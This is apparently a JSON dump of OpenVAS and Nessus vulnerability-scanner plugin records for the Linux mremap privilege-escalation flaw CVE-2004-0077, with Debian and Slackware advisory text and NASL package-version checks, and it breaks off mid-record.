"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.4.18, kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-image-2.4.18-i386bf, kernel-patch-2.4.18-powerpc\nannounced via 
advisory DSA 438-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53138", "href": "http://plugins.openvas.org/nasl.php?oid=53138", "type": "openvas", "title": "Debian Security Advisory DSA 438-1 (kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_438_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 438-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.18-14.2 of kernel-source, version 2.4.18-14 of alpha\nimages, version 2.4.18-12.2 of i386 images, version 2.4.18-5woody7\nof i386bf images and version 2.4.18-1woody4 of powerpc images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem is fixed in version\n2.4.24-3 for source, i386 and alpha images and version 2.4.22-10 for\npowerpc images.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.4.18, kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-image-2.4.18-i386bf, kernel-patch-2.4.18-powerpc\nannounced via advisory DSA 438-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20438-1\";\n\nif(description)\n{\n script_id(53138);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 438-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.18\", ver:\"2.4.18-14.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.18\", ver:\"2.4.18-14.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.18-powerpc\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-generic\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-smp\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-generic\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-smp\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-386\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-586tsc\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n 
report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686-smp\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k6\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k7\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-386\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-586tsc\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686-smp\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k6\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k7\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-386\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-586tsc\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686-smp\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k6\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k7\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif 
((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-bf2.4\", ver:\"2.4.18-5woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-bf2.4\", ver:\"2.4.18-5woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-newpmac\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc-smp\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-patch-2.4.17-mips\nannounced via advisory DSA 441-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53141", "href": "http://plugins.openvas.org/nasl.php?oid=53141", "type": "openvas", "title": "Debian Security Advisory DSA 441-1 (kernel-patch-2.4.17-mips)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_441_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 441-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.17-0.020226.2.woody5 for mips and mipsel kernel images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the next upload of a 2.4.19 kernel image and in version\n2.4.22-0.030928.3 for 2.4.22 for the mips and mipsel architectures.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-patch-2.4.17-mips\nannounced via advisory DSA 441-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20441-1\";\n\nif(description)\n{\n script_id(53141);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 441-1 (kernel-patch-2.4.17-mips)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.17-mips\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-ip22\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r5k-ip22\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r3k-kn02\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-kn04\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mips-tools\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0985", "CVE-2004-0077"], "description": "The remote host is missing an update as announced\nvia advisory 
SSA:2004-049-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053944", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053944", "type": "openvas", "title": "Slackware Advisory SSA:2004-049-01 Kernel security update ", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_049_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53944\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2003-0985\", \"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-049-01 Kernel security update \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK9\\.1\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-049-01\");\n\n script_tag(name:\"insight\", value:\"New kernels are available for Slackware 9.1 and -current to fix\na bounds-checking problem in the kernel's mremap() call which\ncould be used by a local attacker to gain root privileges.\nPlease note that this is not the same issue as CVE-2003-0985\nwhich was fixed in early January.\n\nThe kernels in Slackware 8.1 and 9.0 that were updated in\nJanuary are not vulnerable to this new issue because the patch\nfrom Solar Designer that was used to fix the CVE-2003-0985 bugs\nalso happened to fix the problem that was discovered later.\n\nSites running Slackware 9.1 or -current should upgrade to a\nnew kernel. 
After installing the new kernel, be sure to run\n'lilo'.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-049-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"kernel-ide\", ver:\"2.4.24-i486-2\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"kernel-source\", ver:\"2.4.24-noarch-2\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T10:00:15", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-466-1 : linux-kernel-2.2.10-powerpc-apus - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.10", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.10-powerpc-apus"], "id": "DEBIAN_DSA-466.NASL", "href": "https://www.tenable.com/plugins/nessus/15303", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-466. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15303);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"466\");\n\n script_name(english:\"Debian DSA-466-1 : linux-kernel-2.2.10-powerpc-apus - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.2.10-13woody1 of 2.2 kernel images for the powerpc/apus\narchitecture and in version 2.2.10-2 of Linux 2.2.10 source.\n\nYou are strongly advised to switch to the fixed 2.4.17 kernel-image\npackage for powerpc/apus from woody until the 2.4.20 kernel-image\npackage is fixed in the unstable distribution.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.10-powerpc-apus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.10\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.10\", reference:\"2.2.10-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.10-apus\", reference:\"2.2.10-13woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.10-apus\", reference:\"2.2.10-13woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.10\", reference:\"2.2.10-2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:55:26", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to missing function return value check\nof internal functions a local attacker can gain root privileges.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-438-1 : linux-kernel-2.4.18-alpha+i386+powerpc - missing function return value check", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-i386", "p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-alpha", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-i386bf", "p-cpe:/a:debian:debian_linux:kernel-patch-2.4.18-powerpc", "p-cpe:/a:debian:debian_linux:kernel-source-2.4.18"], "id": "DEBIAN_DSA-438.NASL", "href": "https://www.tenable.com/plugins/nessus/15275", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-438. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15275);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"438\");\n\n script_name(english:\"Debian DSA-438-1 : linux-kernel-2.4.18-alpha+i386+powerpc - missing function return value check\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux 
inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-438\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel packages immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.18-14.2 of kernel-source, version 2.4.18-14 of alpha\nimages, version 2.4.18-12.2 of i386 images, version 2.4.18-5woody7 of\ni386bf images and version 2.4.18-1woody4 of powerpc images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-alpha\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-i386bf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.4.18-powerpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.4.18\");\n 
